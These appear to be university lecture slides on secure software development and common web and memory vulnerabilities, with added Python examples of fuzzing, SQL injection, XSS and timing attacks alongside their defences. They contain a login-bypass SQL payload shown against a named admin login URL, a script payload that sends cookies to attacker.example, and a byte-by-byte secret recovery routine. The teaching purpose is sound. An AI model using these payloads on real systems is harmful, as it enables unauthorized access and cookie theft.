kremer.cpsc.ucalgary.ca

Software Security Analysis
Sydney Pratte, Gellert Kispal, Naomi Hiebert, Shena Fortozo, Adesh Banvait & Alaa Azazi

Presentation Overview
o Secure software development process
o Developer tools for testing security
o Common vulnerabilities and exploits
o Contest (with prizes!)

Development Methods

Secure Software Development Processes
Developing secure software is a matter of following guidelines and strategies, each of which addresses a specific area of software security.

Secure software processes are methodologies and techniques that combine these strategies and guidelines into an integrated, comprehensive construction process for building secure software.

Two widely used processes:
o Microsoft's Security Development Lifecycle (SDL)
o OWASP's Comprehensive Lightweight Application Security Process (CLASP)
Both span the whole lifecycle: design and requirements, planning, evaluation, implementation and testing.

Microsoft's Security Development Lifecycle (SDL)
Adopted by Microsoft as a mandatory policy in 2004 to address the security problems that had previously arisen in its products. It consists of mandatory activities and optional activities.

Mandatory Activities
Pre-SDL requirement: Security Training
o The training must at a minimum cover the fundamental concepts of software security
Phase One: Requirements
o Security requirements gathering
o Risk assessment
o Quality gates
Phase Two: Design
o Attack surface analysis
o Threat modeling
Phase Three: Implementation
o Approve the tool-set to be used
o Deprecate unsafe functions
Phase Four: Verification
o Dynamic testing
o Fuzz testing
Phase Five: Release
o Incident response plan
o Final security review
o Release archive

Optional Activities
Manual Code Review
o Focus on the critical components of the system
o Usually performed by an expert
Penetration Testing
o Simulation of attacks on the running system by skilled testers acting as an attacker would
o Not to be confused with fuzz testing: feeding malformed random data to the system is the Verification-phase activity listed above
Vulnerability Analysis of Similar Applications
o Investigate reputable vulnerability databases for problems reported in comparable software
o Helps avoid known classes of security issues during the design and implementation phases

Development Tools

Metasploit Project
o Popular framework for exploit code development
o Open source editions available
o Identification of system vulnerabilities
o Penetration testing
o Modular approach to exploit development: an exploit can be combined with different payloads

Fuzzing
o Automated technique that feeds invalid or random inputs to a program to find memory errors (overflows, leaks) and unhandled exceptions
o Employed as black-box testing: the fuzzer needs no knowledge of the program's internals
o Types of fuzzing programs:
  o Mutation based: mutate existing data samples to create new test data
  o Generation based: create new test data from a model of the input format

W3AF - Web Application Attack & Audit Framework
o Open source web application vulnerability scanner and exploitation tool
o Identifies, among others:
  o SQL injection
  o Cross-site scripting
  o Guessable credentials
  o Unhandled application errors
  o PHP misconfigurations
o Employs fuzzing techniques
o Divided into a 'core' and 'plugins':
  o The core coordinates the plugins
  o The plugins find vulnerabilities in the target websites
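The two fuzzing strategies from the Fuzzing slide above, mutation based and generation based, as an added example; this is not code from the original slides nor from Metasploit or w3af. The target is a constructed parser for a made-up "count, then (tag, length, value) fields" record format with a deliberate unchecked array index; the format, the parser, the sample record and all function names are assumptions made for this illustration.

```python
"""Added example, not code from the original slides: a small mutation-based
and generation-based fuzzer run against a constructed parser that has a
bounds bug. The record format, the parser and every name here are
assumptions made for this illustration."""
import random

MAX_FIELDS = 4


def parse_record(data: bytes, validate_tag: bool = False) -> list:
    """Target under test. Format (constructed for this example):
    one count byte, then `count` fields of (tag byte, length byte, value).
    Malformed input is rejected with ValueError. The tag is used as an
    array index; with validate_tag=False it is never bounds-checked."""
    if not data:
        raise ValueError("empty record")
    count = data[0]
    fields = [None] * MAX_FIELDS
    pos = 1
    for _ in range(count):
        if pos + 2 > len(data):
            raise ValueError("truncated field header")
        tag, length = data[pos], data[pos + 1]
        value = data[pos + 2:pos + 2 + length]
        if len(value) != length:
            raise ValueError("truncated value")
        if validate_tag and tag >= MAX_FIELDS:
            raise ValueError("tag out of range")
        fields[tag] = value  # BUG when validate_tag is False: tag >= 4 raises IndexError
        pos += 2 + length
    if pos != len(data):
        raise ValueError("trailing bytes")
    return fields


def mutate(seed: bytes, rng: random.Random) -> bytes:
    """Mutation based: derive a new test case from an existing valid sample."""
    data = bytearray(seed)
    for _ in range(rng.randint(1, 3)):
        op = rng.choice(("flip", "insert", "delete", "boundary"))
        i = rng.randrange(len(data))
        if op == "flip":
            data[i] ^= 1 << rng.randrange(8)
        elif op == "insert":
            data.insert(i, rng.randrange(256))
        elif op == "delete" and len(data) > 1:
            del data[i]
        elif op == "boundary":
            data[i] = rng.choice((0, 1, 0x7F, 0x80, 0xFF))
    return bytes(data)


def generate(rng: random.Random) -> bytes:
    """Generation based: build a test case from a model of the format,
    choosing every field (including out-of-range tags) at random."""
    count = rng.randint(0, 6)
    out = bytearray([count])
    for _ in range(count):
        value = bytes(rng.randrange(256) for _ in range(rng.randint(0, 5)))
        out += bytes([rng.randrange(256), len(value)]) + value
    return bytes(out)


def fuzz(target, inputs) -> list:
    """Black-box harness: ValueError is the parser's expected rejection of bad
    input; any other exception is a finding, recorded with the input that caused it."""
    findings = []
    for data in inputs:
        try:
            target(data)
        except ValueError:
            pass
        except Exception as exc:
            findings.append((data, repr(exc)))
    return findings


def run_campaign(seed: int = 1, iterations: int = 500) -> dict:
    """Fuzzes the buggy parser both ways, then the fixed parser the same way."""
    rng = random.Random(seed)
    sample = b"\x02" + b"\x00\x03abc" + b"\x01\x02hi"  # constructed valid record
    fixed = lambda d: parse_record(d, validate_tag=True)
    return {
        "mutation": fuzz(parse_record, [mutate(sample, rng) for _ in range(iterations)]),
        "generation": fuzz(parse_record, [generate(rng) for _ in range(iterations)]),
        "fixed": fuzz(fixed, [generate(rng) for _ in range(iterations)]),
    }


if __name__ == "__main__":
    for kind, found in run_campaign().items():
        print(f"{kind}: {len(found)} findings", found[:1])
```

Both strategies find the same bug, but for different reasons: the mutator only reaches it when a bit flip or boundary value lands on a tag byte of the seed, whereas the generator picks tags from the whole byte range and hits it on most inputs. Neither finds anything in the fixed parser, which is the signal a practitioner wants from a fuzzing run after a patch.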

W3AF - Web Application Attack & Audit Framework (continued)
o Over 130 plugins available, categorized as:
  o Discovery
  o Audit
  o Grep
  o Attack
  o Output
  o Mangle
  o Evasion
  o Brute force
Source: http://www.oxdef.info/papers/en/w3af/w3af-fu/

Vulnerabilities
We will go over:
o SQL injection
o Cross-site scripting
o Access controls
o Timing attacks
o Buffer overflows
o Denial of service

What is a vulnerability?
The classes covered here are insecure interactions between components: data, most commonly user input, crosses from an untrusted source into code that trusts it. SQL injection is the classic case and attacks database-driven applications through their input.

SQL Injection
What is it?
o A form of code injection
o Improper neutralization of special elements in user input that could alter the SQL statement being built
http://imgs.xkcd.com/comics/exploits_of_a_mom.png

SQL Injection: Consequences
o Loss of confidentiality: a gateway to steal or corrupt data
o Weakened security: can compromise access to the system itself, e.g. by bypassing a login
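The login query from these slides rebuilt with Python's standard sqlite3 module, as an added example that is not code from the original slides or from the site they mention: the same statement assembled by string concatenation (vulnerable), with quote escaping, and with bound parameters. The account table, its two sample rows, the plaintext passwords (a real system stores hashes) and the function names are assumptions made for this illustration.

```python
"""Added example, not code from the original slides: the login query from
the slides rebuilt with Python's sqlite3 module, first by string
concatenation (vulnerable) and then with bound parameters. The table
contents and the function names are assumptions for this illustration."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory account table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO account VALUES (?, ?, ?)",
        [("admin", "Tr0ub4dor&3", "admin"), ("guest", "guest", "user")],
    )
    return conn


def login_concat(conn, username: str, password: str) -> list:
    """Vulnerable: user input is pasted into the statement text, so a quote
    in the input ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT username, role FROM account WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_escaped(conn, username: str, password: str) -> list:
    """Escaping the quote character defeats this particular payload, but it is
    easy to get wrong in other contexts (numeric literals, LIKE patterns,
    identifiers), so it is a second line of defence, not the primary one."""
    esc = lambda s: s.replace("'", "''")
    sql = ("SELECT username, role FROM account WHERE username = '" + esc(username)
           + "' AND password = '" + esc(password) + "'")
    return conn.execute(sql).fetchall()


def login_param(conn, username: str, password: str) -> list:
    """Parameterized query: the statement structure is fixed before the input
    is supplied, so the input can only ever be a value."""
    sql = "SELECT username, role FROM account WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def demo() -> dict:
    """Runs the slide's payload against all three variants."""
    conn = make_db()
    payload = "' or ''='"  # the slide's password: closes the literal, appends "or ''=''"
    return {
        "concat": login_concat(conn, "admin", payload),    # every row matches
        "escaped": login_escaped(conn, "admin", payload),  # no row matches
        "param": login_param(conn, "admin", payload),      # no row matches
        "legit": login_param(conn, "admin", "Tr0ub4dor&3"),
    }
```

With concatenation the statement becomes `... AND password = '' or ''=''`; AND binds tighter than OR, so the clause is true for every row and the "login" returns all accounts. The parameterized version never parses the payload as SQL at all, which is why it is the primary defence and escaping only a fallback.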

SQL Injection: Prevention
Practice defensive coding:
o Use parameterized queries (prepared statements), so that input can never change the structure of the statement
o Clean and validate input
o Check and enforce data types
o Escape special characters when a value really must be built into the statement text
o Information hiding: alias tables and use unique field names, so that error messages and guesses reveal less of the schema

SQL Injection: Example
http://www.quickwrench.com/Admin/adminlogin.asp
Username: admin
Password: ' or ''='
The login form pastes both fields into the statement, which becomes:
SELECT * FROM account WHERE username = 'admin' AND password = '' or '' = ''
The injected quote closes the password literal; '' = '' is always true, so the WHERE clause matches every row and the login succeeds without the password.

SQL Injection: Summary
Remember: if you don't clean and validate your input, you're going to have a bad time.

Cross-Site Scripting
What is it?
o Also known as XSS
o Commonly found in web applications
o Enables an attacker to embed malicious script into a legitimate web page
Example: http://xss.com/index.php?name=guest displays "Welcome guest" by echoing the name parameter into the page; if the parameter is not escaped, a name containing a <script> element is executed by every browser that opens the link.

Cross-Site Scripting: Consequences
o Compromise private information
o Manipulate or steal cookies
o Create requests on behalf of the victim

Cross-Site Scripting: How?
o Improper sanitization of data from a web request or user input before it is written into the page
o It gets around the browser's same-origin policy: the injected script runs with the origin of the legitimate page, although the policy says a document or script from one origin should not interact with resources from another origin
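The "Welcome <name>" page from the XSS slide rendered three ways, as an added example that is not code from the original slides or from the site they mention: echoed unescaped (the vulnerability), with contextual HTML escaping, and with a whitelist check before escaping. The page markup, the two constructed payloads (one for the text context, one that tries to break out of a quoted attribute), the whitelist and the function names are assumptions made for this illustration.

```python
"""Added example, not code from the original slides: the 'Welcome <name>'
page from the XSS slide rendered three ways, with a constructed script
payload and a constructed attribute-breakout payload. The page markup,
the whitelist and the function names are assumptions for this illustration."""
import html
import re

# Whitelist for a display name (assumption): letters, digits, underscore, 1..32 chars.
NAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

# Constructed payloads. The first injects a tag into HTML text; the second closes
# the quoted href attribute and adds an event-handler attribute.
SCRIPT_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_vulnerable(name: str) -> str:
    """Echoes the request parameter straight into HTML, like the slide's index.php."""
    return '<p>Welcome ' + name + '</p><a href="/profile?name=' + name + '">profile</a>'


def render_escaped(name: str) -> str:
    """Contextual output encoding: html.escape turns < > & " ' into entities, so the
    value cannot start a tag in text context or close the quoted attribute."""
    safe = html.escape(name, quote=True)
    return '<p>Welcome ' + safe + '</p><a href="/profile?name=' + safe + '">profile</a>'


def render_whitelisted(name: str) -> str:
    """Input validation first, encoding second: reject anything outside the whitelist."""
    if not NAME_RE.fullmatch(name):
        raise ValueError("invalid name")
    return render_escaped(name)


def attribute_closed_early(page: str) -> bool:
    """True if the injected value terminated the href attribute, i.e. the page now
    carries an on* handler attribute right after a closed href."""
    return re.search(r'href="[^"]*"\s+on\w+=', page) is not None
```

html.escape is the right encoding for HTML text and quoted attribute values only; a value placed inside a JavaScript string, a URL or a CSS block needs that context's encoding instead. The whitelist check belongs on the server, since anything done in the browser can be skipped by the attacker.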

Cross-Site Scripting: Prevention
o Proper escaping and quoting of untrusted data for the context it is written into (HTML text, attribute, JavaScript, URL)
o Security checks on the server side; client-side checks help usability but are trivially bypassed, so they are not a defence on their own
o Specifying a proper character encoding scheme, so the browser cannot be tricked into reinterpreting bytes as markup
o Whitelist of acceptable inputs
Remember: the purpose is to steal the victim's information. The victim is usually unaware of the attack, since the malicious code is typically embedded in a link and runs on top of the legitimate website.

Access Controls

Access Control Problems
Access control decides who is allowed to do exactly what in your system: authentication establishes who the user is, and authorization checks what that user may do. Many software security vulnerabilities arise from deficient or missing access control.

Access Control Problems: Examples
o Missing authentication
o Incorrect authentication
o Allowance of unlimited or numerous authentication attempts

Missing Authentication
Providing no authentication for a sensitive function lets users access resources and perform actions that they should not be able to. Requiring users to authenticate and assigning separate privileges per user (or per role) when designing the system protects this functionality.

Incorrect Authentication
Access control is applied to certain resources or actions but is implemented in a way that can be bypassed, for example by trusting a value the client supplies or by checking only some of the paths that reach the resource.

Allowance of Unlimited Authentication Attempts
Attackers repeatedly guess different passwords until they succeed. This vulnerability is corrected by limiting the number of failed attempts allowed in a short period of time (a lockout or an increasing delay per account).

Attacks on Systems

Timing Attack
Basic Definition:

An attempt to compromise a system by analyzing the time taken to execute an operation, classically a cryptographic algorithm, although a password or token comparison leaks in the same way.
A naive comparison, which is close to what executes at machine level, returns as soon as it finds a character that differs. The time it takes therefore reveals how many leading characters of the guess were correct, so the attacker can recover the secret one character at a time instead of guessing it whole.
Typically works only where the attacker gets an unlimited number of attempts and can measure precisely, which in practice means offline or local systems.
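The early-exit comparison just described, the attack that recovers a secret from it one byte at a time, and the two defences these slides recommend for it and for the unlimited-attempts problem above (a constant-time comparison and a limit on failed attempts), as an added example that is not code from the original slides. To keep the result deterministic, the attacker's "stopwatch" is a counter of byte comparisons rather than wall-clock time; the secret, the lockout thresholds and all names are assumptions made for this illustration.

```python
"""Added example, not code from the original slides: a password check with
the early-exit comparison that timing attacks exploit, the attack that
recovers the secret from it one byte at a time, and the two defences the
slides recommend (a constant-time comparison and a limit on failed
attempts). The secret, the lockout thresholds and every name here are
assumptions made for this illustration."""
import hmac
import time

SECRET = b"s3cr3t!"  # constructed sample secret


def leaky_equal(a: bytes, b: bytes, counter: list) -> bool:
    """Early-exit comparison. counter[0] counts byte comparisons performed and
    stands in for the wall-clock time an attacker would measure."""
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        counter[0] += 1
        if x != y:
            return False
    return True


def constant_time_equal(a: bytes, b: bytes) -> bool:
    """Defence 1: hmac.compare_digest does not stop at the first mismatch."""
    return hmac.compare_digest(a, b)


class AttemptLimiter:
    """Defence 2: lock an account after max_failures failures inside `window` seconds."""

    def __init__(self, max_failures=5, window=300.0, clock=time.monotonic):
        self.max_failures, self.window, self.clock = max_failures, window, clock
        self._failures = {}  # account -> timestamps of recent failures

    def is_locked(self, account: str) -> bool:
        now = self.clock()
        recent = [t for t in self._failures.get(account, []) if now - t < self.window]
        self._failures[account] = recent
        return len(recent) >= self.max_failures

    def record_failure(self, account: str) -> None:
        self._failures.setdefault(account, []).append(self.clock())


class LockedOut(Exception):
    pass


def recover_secret(length: int, oracle) -> bytes:
    """Timing attack: for each position try every byte and keep the one for which
    the comparison ran longest (it got one byte further before mismatching)."""
    known = b""
    for pos in range(length):
        best, best_score = 0, -1
        for c in range(256):
            guess = known + bytes([c]) + b"\x00" * (length - pos - 1)
            ok, steps = oracle(guess)
            score = steps + (1 if ok else 0)  # a full match outranks equal step counts
            if score > best_score:
                best, best_score = c, score
        known += bytes([best])
    return known


def attack_unlimited_attempts() -> bytes:
    """Leaky comparison and no attempt limit: the secret is recovered in at
    most 256 * len(SECRET) queries instead of 256 ** len(SECRET)."""
    def oracle(guess):
        counter = [0]
        return leaky_equal(SECRET, guess, counter), counter[0]
    return recover_secret(len(SECRET), oracle)


def attack_with_limiter(max_failures: int = 5) -> int:
    """Same leaky comparison behind an attempt limit: returns how many queries
    the attacker got before the account locked."""
    limiter, account, queries = AttemptLimiter(max_failures), "admin", [0]

    def oracle(guess):
        if limiter.is_locked(account):
            raise LockedOut(account)
        counter = [0]
        ok = leaky_equal(SECRET, guess, counter)
        queries[0] += 1
        if not ok:
            limiter.record_failure(account)
        return ok, counter[0]

    try:
        recover_secret(len(SECRET), oracle)
    except LockedOut:
        return queries[0]
    return -1  # not reached: the secret is not guessed within the limit
```

Against a real service the leak is measured over the network with many samples per guess, which is noisier but the same attack. Replacing leaky_equal with constant_time_equal removes the signal; the limiter removes the unlimited attempts the attack depends on, and should be combined with the delay the slides mention so that legitimate users are not locked out by a single burst of guesses.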

Prevention:
o Compare in constant time: only return the result once the end of the string is reached, instead of returning as soon as an inequality is found (or use a library constant-time comparison)
o Time delay or lockout after a certain number of failed attempts
Remember: the attacker must have unlimited attempts, so it mostly works on offline systems.

Buffer Overflow
A software fault that occurs while writing to memory: the program overruns the space allocated for a buffer and writes into adjacent memory. Most commonly found in C/C++ programs, because the standard library functions (strcpy, gets and the like) do no bounds checking for you.
An attacker can gain admin privileges by overwriting the memory slot where an access permission is stored, or overwrite a saved return address to run code of their choosing.
Prevention:
o Proper bounds checks on every write, using length-bounded copy functions
o Compiler and OS protections (stack canaries, non-executable stacks, ASLR) make exploitation harder but do not remove the fault
Remember: the program is writing into memory it isn't supposed to. An attacker can upgrade their privileges or even bypass the password check.

Denial of Service
An attempt to make a machine unavailable or busy and deny service to its intended users.
o Commonly aimed at important systems such as bank websites and polling websites, where people rely heavily on the service
o DoS by itself does not compromise the system: no information is leaked during the attack
How it works (connection exhaustion):
o The attacker sends connection requests, typically from spoofed source IP addresses
o The server replies and allocates state for each one, such as a half-open connection or a thread waiting to interact
o The client never replies, so the server's resources stay tied up until they run out and legitimate clients are turned away
o Mitigations: time out idle half-open connections, limit the connection rate per source, and use SYN cookies so that no state is kept until the handshake completes
Remember: the purpose is to disrupt an important online service; the attackers don't gain access to the system.

Scenarios
For each scenario, decide which attack is being described:
Scenario 1
A) Unlimited Attempts + Timing Attack

B) Cross-site Scripting
C) Buffer Overflow
D) Denial of Service
E) SQL Injection
Scenario 2 (same choices A to E)
Scenario 3 (same choices A to E)
Scenario 4 (same choices A to E)

Questions?
